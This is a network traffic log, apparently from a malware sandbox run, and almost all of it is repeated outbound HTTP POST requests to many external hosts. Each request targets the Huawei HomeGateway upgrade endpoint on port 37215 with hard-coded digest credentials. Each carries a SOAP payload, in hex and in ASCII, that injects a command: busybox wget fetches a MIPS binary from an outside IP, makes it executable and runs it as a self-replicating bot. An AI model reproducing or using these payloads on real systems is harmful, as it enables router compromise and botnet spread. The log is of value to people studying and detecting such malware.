                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2404192.168.2.153860270.23.161.6437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.386461020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2405192.168.2.1559688197.182.179.4837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.386707067 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2406192.168.2.153611441.28.108.15837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.386715889 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2407192.168.2.154962241.13.84.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.386745930 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2408192.168.2.154479441.155.6.16837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.386765957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2409192.168.2.1549784197.92.242.9637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.398335934 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2410192.168.2.1542316197.245.11.22537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.398345947 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2411192.168.2.1558724157.181.249.13637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.398408890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2412192.168.2.1552166197.94.112.11737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.398482084 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2413192.168.2.154191041.81.53.17737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.398494959 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
